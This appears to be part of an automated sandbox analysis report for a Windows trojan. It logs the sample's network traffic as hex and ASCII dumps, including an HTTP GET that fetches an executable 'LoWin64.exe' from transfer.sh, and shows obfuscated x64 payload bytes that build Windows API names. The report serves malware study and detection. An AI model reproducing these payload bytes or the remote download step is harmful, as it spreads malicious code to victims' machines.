                            2023-05-14 02:49:54 UTC1472INData Raw: 00 00 00 28 dc 43 ba df 26 e9 94 c7 00 00 e9 03 ce 00 00 e9 97 ec 00 00 eb 03 cd ac 6d 9c f8 e9 02 00 00 00 dd 54 73 04 3b 3d cf 79 e8 06 00 00 00 94 58 5f 73 c3 bd 48 ff c4 f9 eb 07 36 b8 95 1d d6 27 8f 72 05 6e ba 4d e8 c3 48 ff c4 eb 06 4f 95 23 ee a7 c0 48 ff c4 f8 e9 04 00 00 00 82 30 c9 a7 73 03 a5 ef b2 48 ff c4 f9 eb 03 64 f3 fe 72 03 ab 5b 5c 48 ff c4 f8 73 02 dd a0 48 ff c4 eb 07 8d 52 69 52 d6 ce 8c 48 ff c4 eb 06 9c c2 4d f1 60 5c 48 ff c4 38 c9 eb 05 8f a4 28 39 5d 74 02 c8 f8 eb 05 fa da 31 de cb 9d e9 03 00 00 00 22 1f b7 e9 90 03 01 00 e9 ec 1b 01 00 48 8d 64 24 f8 e9 06 00 00 00 43 e1 f7 5b 87 4f 48 89 04 24 9f eb 03 b6 ad 63 eb 02 39 1f e8 05 00 00 00 83 f3 9b c2 a0 48 8d 64 24 08 9e 58 eb 02 90 8c e9 00 00 00 00 e9 00 00 00 00 9c 48 8d
                            Data Ascii: (C&mTs;=yX_sH6'rnMHO#H0sHdr[\HsHRiRHM`\H8(9]t1"Hd$C[OH$c9Hd$XH
                            2023-05-14 02:49:54 UTC1488INData Raw: 08 e9 03 00 00 00 4b 1e d6 e9 03 00 00 00 45 bc cf 4d 8b 24 24 e9 07 00 00 00 dc f3 ca b8 14 43 c0 48 8d 64 24 f8 e9 05 00 00 00 14 db e9 e4 4e 48 89 04 24 e9 05 00 00 00 27 fe 9e 94 1f 9f e9 07 00 00 00 cd 2f 3a f6 df 16 56 38 c9 74 07 56 1e 8d a5 e2 be 95 e8 07 00 00 00 49 f1 42 45 5f 5f 5b 48 8d 64 24 08 eb 03 28 d4 b1 9e 58 e9 04 00 00 00 f4 60 fc d0 e9 07 00 00 00 e7 d2 85 6e db af 50 4c 8b ec 49 81 c5 c0 00 00 00 4d 8b 6d 00 eb 03 41 a7 4a 48 8d 64 24 f8 e9 07 00 00 00 37 55 31 e4 8b bf c8 48 89 04 24 9f eb 03 fa d2 64 38 c0 eb 07 64 97 4f 7b 14 c2 2b 74 06 f9 5d 57 27 4e 40 e8 06 00 00 00 71 b7 a7 a0 b3 94 48 83 04 24 25 38 c0 e9 05 00 00 00 81 20 32 67 9d 74 06 a8 84 f5 74 67 b0 c3 63 16 78 47 46 eb 06 20 7a 9a f2 80 d1 9e 58 e9 04 00 00 00 23 80
                            Data Ascii: KEM$$CHd$NH$'/:V8tVIBE__[Hd$(X`nPLIMmAJHd$7U1H$d8dO{+t]W'N@qH$%8 2gttgcxGF zX#
                            2023-05-14 02:49:54 UTC1504INData Raw: f2 ab e6 8c 8b 48 33 c9 eb 07 3a 61 77 42 c3 c6 25 50 9f 38 e4 e9 05 00 00 00 99 53 42 8d 71 74 06 f7 e5 44 cf d4 9a e8 02 00 00 00 3b 76 48 83 c4 08 eb 04 dc 4f c1 5b 9e 58 8a 0f 48 ff c7 50 eb 06 61 72 df b7 ba 34 9f f9 eb 06 ac 66 5a 5e e5 4e 72 07 31 e7 80 e9 54 de 66 e8 06 00 00 00 ea f4 b9 aa 34 4a 48 8d 64 24 08 eb 04 f5 44 9c 1a e9 05 00 00 00 7a 8b e7 6e db 9e 48 8b 04 24 e9 04 00 00 00 57 81 60 2a 48 8d 64 24 08 eb 06 64 40 99 d4 d3 aa 48 33 c0 e9 07 00 00 00 c4 11 7e 85 f5 e7 38 50 e9 02 00 00 00 c0 d8 9f e9 06 00 00 00 17 95 e4 30 b8 e4 f8 e9 04 00 00 00 2b b3 f7 32 73 07 87 ef eb 63 96 49 4d e8 07 00 00 00 ce d1 88 ad bc c0 ec 48 8d 64 24 08 9e 48 8b 04 24 e9 04 00 00 00 ee cc 64 82 48 8d 64 24 08 48 33 db eb 02 3c 76 50 e9 02 00 00 00 ec d2
                            Data Ascii: H3:awB%P8SBqtD;vHO[XHPar4fZ^Nr1Tf4JHd$DznH$W`*Hd$d@H3~8P0+2scIMHd$H$dHd$H3<vP
                            2023-05-14 02:49:54 UTC1520INData Raw: 6a 48 ff c4 38 c9 e9 02 00 00 00 b6 50 74 05 9c 4d db 94 79 48 ff c4 38 e4 eb 06 38 45 e7 2f 36 90 74 05 67 45 ff ae fe 48 ff c4 f8 e9 05 00 00 00 66 20 e0 25 26 73 07 15 54 1c 54 43 21 18 eb 05 88 ff fe 56 8a 9e 48 8b 04 24 eb 04 18 28 94 8d 48 8d 64 24 08 48 81 c1 f0 00 00 00 e9 04 00 00 00 8e d0 aa bb 50 eb 02 74 1a 9f e9 04 00 00 00 5d 43 9b 76 eb 05 8c 86 81 88 da e8 06 00 00 00 3d 4e a2 59 b2 cb 48 83 04 24 18 f8 73 02 e2 57 c3 ff d4 e7 9f 23 59 cb eb 07 84 1f f5 fd 3b 66 cb 9e 48 8b 04 24 eb 06 6c 29 d8 1e 21 9e 48 8d 64 24 08 eb 07 df 3b 29 52 36 51 8f 48 8b 09 51 9d 48 0b c3 e9 05 00 00 00 7e 18 b6 99 9f 48 8d 64 24 f8 48 89 04 24 eb 03 33 17 22 9f f8 eb 04 2e 63 5d 95 73 06 41 73 1a ea 89 74 e8 05 00 00 00 eb d3 31 24 be 48 8d 64 24 08 eb 05 da
                            Data Ascii: jH8PtMyH88E/6tgEHf %&sTTC!VH$(Hd$HPt]Cv=NYH$sW#Y;fH$l)!Hd$;)R6QHQH~Hd$H$3".c]sAst1$Hd$
                            2023-05-14 02:49:54 UTC1536INData Raw: 90 73 06 94 bb 47 76 5c b1 48 ff c4 f9 72 07 e5 43 44 a7 78 25 39 48 ff c4 f8 73 06 26 1e 94 9b bf e0 48 ff c4 eb 06 fb 1c 98 d8 e1 81 48 ff c4 f9 e9 06 00 00 00 21 78 6f c8 32 90 72 02 fd 35 eb 02 c4 99 eb 05 66 bc 6c d5 33 9e 48 8b 04 24 48 8d 64 24 08 eb 04 64 ea 45 39 48 33 c9 8a 0f 48 33 db 48 8b 1c cc 48 ff c7 eb 03 98 a0 1a 50 eb 06 a9 e9 51 da 81 6c 9f e9 04 00 00 00 c5 1d b8 ef 38 c9 74 02 4d c0 e8 06 00 00 00 1b e4 3e be 27 1f 48 ff c4 f8 73 05 b2 d7 7c b8 bd 48 ff c4 38 ff 74 07 cf df a1 4c e7 48 a2 48 ff c4 f9 e9 04 00 00 00 7e 36 a4 93 72 05 ca 22 a6 a2 9f 48 ff c4 38 db 74 06 c1 ed ad 51 ac ae 48 ff c4 f9 e9 07 00 00 00 25 35 7e da 84 cc 66 72 03 6e 32 d2 48 ff c4 f9 eb 04 77 4d d0 a8 72 02 42 49 48 ff c4 38 c0 e9 06 00 00 00 89 ea 26 d7 11
                            Data Ascii: sGv\HrCDx%9Hs&HH!xo2r5fl3H$Hd$dE9H3H3HHPQl8tM>'Hs|H8tLHH~6r"H8tQH%5~frn2HwMrBIH8&
                            2023-05-14 02:49:54 UTC1552INData Raw: 70 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 0e 02 07 0b 48 00 00 00 00 00 00 00 13 03 03 0b 02 03 0b 1a 03 03 0b 03 02 03 03 0e 02 07 0b a0 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 0e 02 07 0b 40 00 00 00 00 00 00 00 13 03 03 0b 02 03 0b 1a 03 03 0b 03 02 03 03 0e 02 07 0b 38 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 03 0b 03 02 03 03 0e 02 07 0b 30 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 03 0b 03 02 03 03 0e 02 07 0b 28 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 02 0b 03 02 03 03 0e 02 07 0b 20 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 02 0b 03 02 03 03 1c 02 03 0b 1c 0e 03 03 0b 02 03 1c 03 02 03 03 13 02 03 0b 13 0e 03
                            Data Ascii: pH@80(
                            2023-05-14 02:49:54 UTC1568INData Raw: 03 14 10 72 02 00 00 02 03 03 0e 02 07 0b 32 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 1a 02 03 1b 03 02 03 03 1a 02 03 0b 1a 0e 03 03 0b 02 03 1a 03 02 07 03 01 00 00 00 00 00 00 00 02 02 16 03 02 07 20 55 79 2f 40 01 00 00 00 0a 02 03 03 0e 02 07 0b 6a 00 00 00 00 00 00 00 13 03 03 0b 02 03 17 03 02 03 03 0e 02 07 0b 32 00 00 00 00 00 00 00 13 03 03 0b 02 03 16 03 02 07 20 fe 31 01 40 01 00 00 00 02 07 03 c7 e7 2d 40 01 00 00 00 02 07 0b 08 00 00 00 00 00 00 00 10 03 0e 0b 03 03 03 0e 0a 02 03 03 1a 02 03 16 03 02 07 20 88 e6 04 40 01 00 00 00 02 07 03 d2 e7 2d 40 01 00 00 00 02 07 0b 08 00 00 00 00 00 00 00 10 03 0e 0b 03 03 03 0e 0a 02 03 03 1a 02 03 16 03 02 07 20 85 5b 07 40 01 00 00 00 02 07 03 dd e7 2d 40 01 00 00 00 02 07 0b 08 00 00
                            Data Ascii: r2 Uy/@j2 1@-@ @-@ [@-@


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.3 | 49708 | 144.76.136.153 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2023-05-14 02:51:06 UTC | 1582 | OUT | GET /get/1h9hjM/LoWin64.exe HTTP/1.1
                            User-Agent: Monkey
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2023-05-14 02:51:07 UTC | 1582 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:51:07 GMT
                            Content-Type: application/x-ms-dos-executable
                            Content-Length: 1628132
                            Connection: close
                            Cache-Control: no-store
                            Content-Disposition: attachment; filename="LoWin64.exe"
                            Retry-After: Sun, 14 May 2023 04:51:07 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.47,102.129.143.47
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1684032667
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2023-05-14 02:51:07 UTC1934INData Raw: 38 d2 74 04 7b bc c4 1c 48 ff c4 38 ed 74 07 41 67 58 b4 93 c2 61 48 ff c4 f9 eb 04 48 e2 6b 41 72 07 98 4c 2f 3f 8e f3 87 48 ff c4 f8 73 05 6c 3d c4 f0 37 e9 02 00 00 00 f9 32 9e 48 8b 04 24 e9 04 00 00 00 c3 d3 f8 6e 48 8d 64 24 08 eb 02 4b 78 e9 03 00 00 00 6d 5c 26 0f 83 cf 01 00 00 48 8b 04 24 50 e9 07 00 00 00 19 ce 49 3f 5b d6 e0 9f e9 05 00 00 00 18 52 dc 33 3e f9 e9 07 00 00 00 d5 27 e3 95 65 e7 1e 72 07 9f 9e c5 e0 a9 48 49 e8 05 00 00 00 46 55 7a 51 51 48 ff c4 38 ff e9 03 00 00 00 ad d5 bd 74 06 b1 ec dd a3 55 83 48 ff c4 f8 73 02 42 40 48 ff c4 48 ff c4 38 db eb 02 58 48 74 02 6a e2 48 ff c4 f9 eb 05 3f c1 a0 69 62 72 06 65 59 6e 9c dd 9c 48 ff c4 38 c0 eb 07 b7 cd 94 98 26 b5 7e 74 07 83 fe 35 58 45 9f 99 48 ff c4 38 db e9 07 00 00 00 c0 4b
                            Data Ascii: 8t{H8tAgXaHHkArL/?Hsl=72H$nHd$Kxm\&H$PI?[R3>'erHIFUzQQH8tUHsB@HH8XHtjH?ibreYnH8&~t5XEH8K
                            2023-05-14 02:51:07 UTC1950INData Raw: 07 00 00 00 e6 e4 91 67 e6 19 cc eb 07 4a 59 89 ab b6 78 2a e9 05 00 00 00 e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 28 e9 4f 00 00 00 eb 07 9a ec 8e 55 e3 6c b4 9c f9 eb 07 22 3c fe 4c ac aa 31 72 03 29 8f 1d e8 07 00 00 00 4e d1 4c 64 60 b9 40 48 83 04 24 21 f8 eb 05 e9 a8 c2 8c f6 73 07 18 ac c2 7a 9d 6d e7 c3 11 58 dc eb 03 c3 63 33 9d e9 05 00 00 00 1e fc f0 dc cc c6 44 24 08 4e c6 44 24 09 74 e9 04 00 00 00 6d de c3 4d 48 8d 64 24 f8 48 89 04 24 e9 07 00 00 00 de bb f4 f4 45 39 6f 9f eb 06 74 70 13 1b 6d ed f8 73 02 84 4d e8 06 00 00 00 72 17 66 1e 3d ee 48 8d 64 24 08 e9 04 00 00 00 80 ef 9c c0 9e 58 c6 44 24 0a 53 c6 44 24 0b 65 c6 44 24 0c 74 c6 44 24 0d 49 c6 44 24 0e 6e eb 03 dd 32 4d 48 8d 64 24 f8 eb 07 bb 7e 11 ad b2 92 f5 48 89
                            Data Ascii: gJYx*H(HL$H(OUl"<L1r)NLd`@H$!szmXc3D$ND$tmMHd$H$E9otpmsMrf=Hd$XD$SD$eD$tD$ID$n2MHd$~H
                            2023-05-14 02:51:07 UTC1966INData Raw: e4 e9 03 00 00 00 76 3e a4 74 02 75 66 e8 06 00 00 00 16 f0 8a 7b d7 6d 48 83 c4 08 9d eb 02 14 fe eb 06 ab 2e eb fa e4 ed c6 44 24 17 4f c6 44 24 18 62 c6 44 24 19 6a c6 44 24 1a 65 eb 06 ec 17 86 27 27 31 50 e9 04 00 00 00 43 81 87 f8 9f e9 05 00 00 00 2c de 44 da d1 f9 eb 04 f6 ee 6d f5 72 06 49 d0 26 b6 87 ee e8 05 00 00 00 92 96 49 14 a0 48 83 c4 08 eb 07 53 2c 5b c9 6a cd 69 e9 05 00 00 00 5e 66 3d 1e 70 9e 48 8b 04 24 e9 07 00 00 00 73 3f 2c 81 98 fe 66 48 8d 64 24 08 c6 44 24 1b 63 50 9f e9 05 00 00 00 dc fe e6 8a 38 f8 73 03 17 34 66 e8 07 00 00 00 ae 58 4e 61 8c fc 28 48 83 04 24 10 c3 c5 33 71 e9 03 00 00 00 1e 9c 37 e9 07 00 00 00 75 1d 40 9e 19 d5 71 9e 48 8b 04 24 48 8d 64 24 08 e9 07 00 00 00 ef 38 c5 a3 4a b0 5b c6 44 24 1c 74 eb 05 11 30
                            Data Ascii: v>tuf{mH.D$OD$bD$jD$e''1PC,DmrI&IHS,[ji^f=pH$s?,fHd$D$cP8s4fXNa(H$3q7u@qH$Hd$8J[D$t0
                            2023-05-14 02:51:07 UTC1982INData Raw: 1d f9 e9 02 00 00 00 c8 51 72 07 8d b1 aa 1a c0 d6 92 c3 47 71 6f e9 04 00 00 00 77 92 a9 37 9e 58 eb 07 78 df 3d 71 a9 e2 f2 48 8b 44 24 30 e9 c1 00 00 00 e9 02 00 00 00 f9 1f 9c 38 d2 e9 05 00 00 00 a2 87 b0 9f 9a 74 03 42 7a fd e8 07 00 00 00 e1 de 61 a8 7a c2 27 48 ff c4 38 f6 e9 05 00 00 00 f0 3b fb 2f 4d 74 02 af f4 48 ff c4 e9 07 00 00 00 7b 6c 4a fb a1 44 98 48 ff c4 eb 03 e5 16 63 48 ff c4 f9 72 07 d3 51 d3 cc ed 1b a2 48 ff c4 38 db e9 02 00 00 00 e2 a5 74 06 34 e3 5a 7a a9 2e 48 ff c4 f9 eb 07 da 93 1c 55 a4 3d 6a 72 06 cc 48 de 64 cb 55 48 ff c4 38 c0 e9 05 00 00 00 a0 a0 f9 92 5d 74 03 93 6b 5c 48 ff c4 38 e4 e9 03 00 00 00 31 41 17 74 02 bc ae e9 04 00 00 00 7e 9f 35 43 9d e9 03 00 00 00 4c df bb e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08
                            Data Ascii: QrGqow7Xx=qHD$08tBzaz'H8;/MtH{lJDHcHrQH8t4Zz.HU=jrHdUH8]tk\H81At~5CLH(HL$
                            2023-05-14 02:51:07 UTC1998INData Raw: 46 ba 6a 5c ff f9 eb 07 61 b7 58 18 bb 60 73 72 04 4e b5 38 39 e8 05 00 00 00 a3 bd a5 d6 ad 48 ff c4 f9 72 04 4a 2e c3 70 48 ff c4 38 d2 74 07 fa fc d8 68 75 1f 55 48 ff c4 38 f6 74 03 eb 2c 79 48 ff c4 f9 72 04 df 54 2d 68 48 ff c4 f9 e9 06 00 00 00 8e 91 3a 7b c0 d1 72 03 99 ce 48 48 ff c4 48 ff c4 38 db e9 02 00 00 00 f3 51 74 07 8d af fa 77 3c 35 f0 48 ff c4 e9 03 00 00 00 bf d3 e7 e9 03 00 00 00 fc 3e 63 e9 06 00 00 00 7c 98 67 86 d0 11 9e 48 8b 04 24 e9 04 00 00 00 82 16 20 1c 48 8d 64 24 08 e9 06 00 00 00 64 8b dd a4 cd 11 85 c0 48 8d 64 24 f8 e9 06 00 00 00 be b9 e7 f4 a0 b0 48 89 04 24 e9 05 00 00 00 13 78 76 d2 9b 9f e9 07 00 00 00 79 5d d2 2e ab 62 f7 f8 73 07 84 d1 69 50 38 31 a1 e8 04 00 00 00 bb d9 f7 ac 48 ff c4 f8 73 04 16 a3 de c8 48 ff
                            Data Ascii: Fj\aX`srN89HrJ.pH8thuUH8t,yHrT-hH:{rHHH8Qtw<5H>c|gH$ Hd$dHd$H$xvy].bsiP81HsH
                            2023-05-14 02:51:07 UTC2014INData Raw: 24 f8 eb 02 2d 39 48 89 04 24 9f e9 06 00 00 00 65 94 eb b1 4b b2 f8 73 02 40 33 e8 02 00 00 00 36 d6 48 83 04 24 1e f9 e9 07 00 00 00 62 3f 64 3a a4 4f 1c 72 04 11 f4 71 53 c3 96 e0 d2 eb 06 e3 95 33 dd eb b5 9e 58 eb 06 8a 23 fe 77 96 ac e9 03 00 00 00 6d e9 ba 48 8b 84 c1 1a 01 00 00 48 89 44 24 30 48 83 7c 24 30 00 48 8d 64 24 f8 eb 03 dc 7c 53 48 89 04 24 9f eb 05 9f 36 b4 b1 53 f9 eb 05 36 40 2c 82 84 72 04 8c a0 ab 19 e8 05 00 00 00 90 e9 3f ae cd 48 8d 64 24 08 e9 04 00 00 00 9a 7c 41 96 9e 48 8b 04 24 eb 05 54 ed 63 df 9a 48 8d 64 24 08 eb 05 1e 6a a1 54 17 e9 07 00 00 00 af e4 98 db 30 6d 32 0f 84 6b 03 00 00 eb 04 d1 35 c4 b0 50 eb 07 be 6b b5 79 42 63 89 9f e9 02 00 00 00 d2 b0 eb 07 85 79 7e 3a 18 b2 75 e8 06 00 00 00 1e c8 1b bc 6d 7e 48 83
                            Data Ascii: $-9H$eKs@36H$b?d:OrqS3X#wmHHD$0H|$0Hd$|SH$6S6@,r?Hd$|AH$TcHd$jT0m2k5PkyBcy~:um~H
                            2023-05-14 02:51:07 UTC2030INData Raw: 87 59 48 ff c4 38 f6 eb 04 d9 22 f9 d1 74 03 11 3f d3 48 ff c4 f9 72 04 4e e3 1a a6 48 ff c4 48 ff c4 f8 73 02 bd ba 48 ff c4 f8 73 06 62 aa 4a 50 d0 f0 eb 06 a5 f8 d7 6b f6 6d 9e 48 8b 04 24 eb 04 95 59 e3 c3 48 8d 64 24 08 eb 04 dc 94 6a fa 48 8b 4c 24 70 8b 4c 01 08 e8 0d f4 fa ff 48 89 84 24 98 00 00 00 4c 8d 8c 24 98 00 00 00 4c 8d 84 24 a8 00 00 00 ba 40 04 00 00 48 8d 4c 24 78 e8 5b eb fb ff 89 44 24 48 83 7c 24 48 00 0f 8c b5 00 00 00 e9 04 00 00 00 8e 13 6a 58 9c e9 04 00 00 00 b0 e4 c0 58 e8 02 00 00 00 22 80 48 83 04 24 12 f8 73 02 e5 e6 c3 5c 91 74 42 37 e9 03 00 00 00 1d 8c d1 9d eb 07 7c 14 31 82 3b 69 95 c7 44 24 64 01 00 00 00 e9 a5 00 00 00 50 eb 05 f4 98 d2 2e 42 9f eb 07 90 6d f7 9c 90 7b 6e f8 73 05 6d 41 72 6c 26 e8 03 00 00 00 8d a5
                            Data Ascii: YH8"t?HrNHHsHsbJPkmH$YHd$jHL$pLH$L$L$@HL$x[D$H|$HjXX"H$s\tB7|1;iD$dP.Bm{nsmArl&
                            2023-05-14 02:51:07 UTC2046INData Raw: e9 b5 0f b7 44 24 20 48 8d 64 24 f8 e9 05 00 00 00 72 ca a1 a1 fc 48 89 04 24 e9 04 00 00 00 d2 1f c1 e2 9f e9 06 00 00 00 17 c9 4d 80 47 ec 38 c0 e9 03 00 00 00 1e 5e 7b 74 04 5d 66 53 32 e8 06 00 00 00 4b 92 1f 27 d3 ae 48 83 04 24 18 38 c0 74 03 60 a8 1c c3 2c f7 9b 43 4a 9e 58 e9 07 00 00 00 14 b8 1f 34 9d f4 d5 eb 05 cc be 35 e0 94 48 6b c0 0c 9c eb 04 f2 25 64 ac eb 05 cb 4a e6 ab 6e e8 05 00 00 00 f0 87 51 55 fb 48 83 04 24 1c 38 ff eb 04 cd 29 97 a4 74 03 4e f2 62 c3 b2 bd 2d d8 e9 03 00 00 00 29 9b 9a 9d e9 07 00 00 00 83 9c 73 36 73 c4 f4 e9 03 00 00 00 43 a3 75 48 8b 4c 24 30 50 eb 02 e6 1e 9f eb 06 b7 7e f9 a7 18 a9 38 db e9 03 00 00 00 9d bb 85 74 07 e7 7a bc 94 f4 f0 f4 e8 05 00 00 00 eb f9 46 4a 4c 48 83 c4 08 eb 02 51 e0 eb 06 e1 86 b6 af
                            Data Ascii: D$ Hd$rH$MG8^{t]fS2K'H$8t`,CJX45Hk%dJnQUH$8)tNb-)s6sCuHL$0P~8tzFJLHQ
                            2023-05-14 02:51:07 UTC2062INData Raw: 05 6f cc ed 30 ea 9c e9 02 00 00 00 9a 92 eb 06 38 2d 78 74 c6 fa e8 05 00 00 00 60 97 a3 eb 42 48 ff c4 38 c9 e9 06 00 00 00 9d 89 c1 47 89 e2 74 04 b2 60 78 55 48 ff c4 f9 e9 03 00 00 00 a6 5f bb 72 04 89 1b 8c 8e 48 ff c4 48 ff c4 48 ff c4 48 ff c4 38 ed 74 06 f7 db 56 31 41 73 48 ff c4 eb 07 d7 75 60 2a f3 fc 83 48 ff c4 f9 eb 02 36 cb 72 02 ae 2b 9d e9 04 00 00 00 e1 de 18 42 c6 44 24 08 4c 9c e9 03 00 00 00 34 c5 b1 f9 72 02 26 4d e8 03 00 00 00 a7 db 2b 48 83 c4 08 9d c6 44 24 09 64 c6 44 24 0a 72 c6 44 24 0b 52 c6 44 24 0c 65 48 8d 64 24 f8 48 89 04 24 9f eb 04 8a cb d7 62 f8 eb 02 c7 62 73 07 7a ea f1 60 9c 45 ee e8 05 00 00 00 2c 2b 88 b2 99 48 ff c4 eb 02 9d 2e 48 ff c4 38 ff eb 07 81 af 9e ec f8 f1 3f 74 04 62 fb 94 8b 48 ff c4 f9 e9 05 00 00
                            Data Ascii: o08-xt`BH8Gt`xUH_rHHHH8tV1AsHu`*H6r+BD$L4r&M+HD$dD$rD$RD$eHd$H$bbsz`E,+H.H8?tbH
                            2023-05-14 02:51:07 UTC2078INData Raw: 71 c7 48 95 6e dd 6b 81 30 7a b1 8e 78 2b 99 d0 ad 62 d2 80 d2 fd 5f 79 54 6f da e7 5d 72 7a 42 e0 49 92 e6 7b 84 5a 30 3d e9 40 ac ff 94 db 76 77 df 72 1c f0 da f7 49 82 db 46 4c ba 37 57 a0 84 3f b8 9c d0 ca 9c d1 54 2e 5c 31 96 8b e5 2f 46 ec f4 e4 6e 5b 33 b6 4e b2 d7 d8 30 73 c9 1e 1b c5 4f 1d e0 35 f9 1d d1 22 de f2 b1 56 40 ac dc 25 65 63 27 d4 7a 4e d7 d0 90 90 90 90 48 83 c4 48 c3 44 88 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 83 ec 78 e9 3b 00 00 00 50 9f e9 06 00 00 00 58 1e 4f 5e 31 57 f9 eb 02 91 48 72 07 7e cb a5 61 be 42 75 e8 04 00 00 00 96 97 fc 54 48 8d 64 24 08 e9 04 00 00 00 cb ad f5 71 9e 58 eb 05 d6 c7 ab ae ba 8b 8c 24 a0 00 00 00 e9 04 00 00 00 f2 2b 74 6f 9c eb 02 7f da 38 ed e9 05 00 00 00 aa d1 56 c8 5f 74
                            Data Ascii: qHnk0zx+b_yTo]rzBI{Z0=@vwrIFL7W?T.\1/Fn[3N0sO5"V@%ec'zNHHDL$ DD$HT$HL$VWHx;PXO^1WHr~aBuTHd$qX$+to8V_t
                            2023-05-14 02:51:07 UTC2094INData Raw: 55 19 a5 39 eb 05 ff 32 2b 67 5e e9 02 00 00 00 19 4a 9e 48 8b 04 24 e9 04 00 00 00 97 84 f2 5b 48 8d 64 24 08 e9 06 00 00 00 97 66 80 32 e2 c9 48 89 44 24 40 eb 03 3b c4 ab 50 eb 03 81 3b 7f 9f eb 06 51 ef ff 6a c0 b5 eb 04 85 6b 45 12 e8 04 00 00 00 14 25 e5 61 48 83 04 24 0e c3 68 2f 41 fa eb 02 d2 e0 9e 48 8b 04 24 e9 04 00 00 00 ee db 6f e4 48 8d 64 24 08 eb 03 6a e9 33 e9 04 00 00 00 da 5f 50 b7 b8 08 00 00 00 48 6b c0 09 48 8b 4c 24 68 48 8d 64 24 f8 e9 04 00 00 00 92 9f 69 5c 48 89 04 24 e9 04 00 00 00 db cf 42 79 9f e9 05 00 00 00 4a 83 d2 4e 23 f9 e9 07 00 00 00 85 61 eb 66 1c de 57 72 03 94 e5 7d e8 02 00 00 00 8f f8 48 ff c4 38 ff 74 04 6f d3 c1 1f 48 ff c4 f9 eb 02 7c 36 72 06 9e 2d e7 ce 11 7b 48 ff c4 eb 02 cc c5 48 ff c4 f9 eb 06 63 74 a2
                            Data Ascii: U92+g^JH$[Hd$f2HD$@;P;QjkE%aH$h/AH$oHd$j3_PHkHL$hHd$i\H$ByJN#afWr}H8toH|6r-{HHct
                            2023-05-14 02:51:07 UTC2110INData Raw: 58 eb 04 e0 68 ac e5 e9 04 00 00 00 3b 56 e7 66 c6 44 24 0e 46 eb 05 cd 2b 81 1e 19 9c e9 06 00 00 00 e1 f3 aa c4 c3 5c e8 04 00 00 00 1a 16 20 be 48 ff c4 f9 eb 05 f9 51 c1 f9 7e 72 04 48 88 a2 2d 48 ff c4 e9 04 00 00 00 f4 71 50 af 48 ff c4 f9 72 05 3c fb db 72 ed 48 ff c4 f9 72 07 92 e4 66 81 d1 4d 8d 48 ff c4 48 ff c4 eb 03 fe 2d e2 48 ff c4 f8 e9 04 00 00 00 f4 f3 6b bc 73 05 1e 72 83 67 bd 48 ff c4 f8 eb 02 6e b8 73 02 72 1c e9 02 00 00 00 ea 30 9d eb 07 a8 e3 aa 9d 3a 4d 97 eb 05 84 13 ec c5 1b c6 44 24 0f 75 eb 02 bf 47 9c eb 04 9a 83 55 4c 38 ed 74 05 7d b4 fd 52 2a e8 02 00 00 00 5b 1f 48 83 04 24 19 f9 e9 02 00 00 00 f5 60 72 02 90 c6 c3 1a e7 41 65 9b eb 03 ce 4a b3 9d e9 04 00 00 00 c6 82 2a b0 c6 44 24 10 6e c6 44 24 11 63 c6 44 24 12 74 c6
                            Data Ascii: Xh;VfD$F+\ HQ~rH-HqPHr<rHrfMHH-HksrgHnsr0:MD$uGUL8t}R*[H$`rAeJ*D$nD$cD$t
                            2023-05-14 02:51:07 UTC2126INData Raw: 30 77 3b e7 52 9f 04 51 f2 13 3f d6 50 b4 2d bb 6e bc 87 e6 6b 62 73 c0 62 9c d7 e8 da e6 48 d0 9c 5e 9f 3a f5 59 cc ab 39 e8 85 31 ea c3 94 02 bb da 7b 79 11 bd 1d 02 54 40 ba 06 5c c9 90 ed 22 e1 a0 20 3c 8e d2 dc 53 c3 2a ed 48 27 1b 0b 63 6d 0f 25 62 77 b7 66 89 65 8b 50 c1 c4 71 ad 9c 6a 2d 15 46 69 46 6a 10 69 2c 16 42 6e 23 5b 4c 41 2a 8f 7f ec 5d 7d 3f 5c d0 42 b4 66 76 7d 02 b1 49 4c dc 58 59 32 f7 19 e9 41 61 d1 5f bb f0 e5 e7 1d 82 05 65 31 1e c3 52 95 1b 74 a6 54 62 5f 6a ef ab 30 d6 17 62 61 e6 3d 5a 7c a3 02 47 fa 2c d8 49 aa 93 8d 21 82 6c f7 d7 c1 e1 03 08 ae 8b 57 ec d2 d8 99 4f 55 6d 0d 4d bc f1 23 ea a8 1b f0 66 75 f6 c5 d2 0c 87 d0 5c 27 75 f2 49 ba 00 19 c9 db 09 7c 95 cf 8c 83 3a 6c bb af b4 ae c6 5f da 34 7c 01 4a 55 ba 40 b5 5c 29
                            Data Ascii: 0w;RQ?P-nkbsbH^:Y91{yT@\" <S*H'cm%bwfePqj-FiFji,Bn#[LA*]}?\Bfv}ILXY2Aa_e1RtTb_j0ba=Z|G,I!lWOUmM#fu\'uI|:l_4|JU@\)
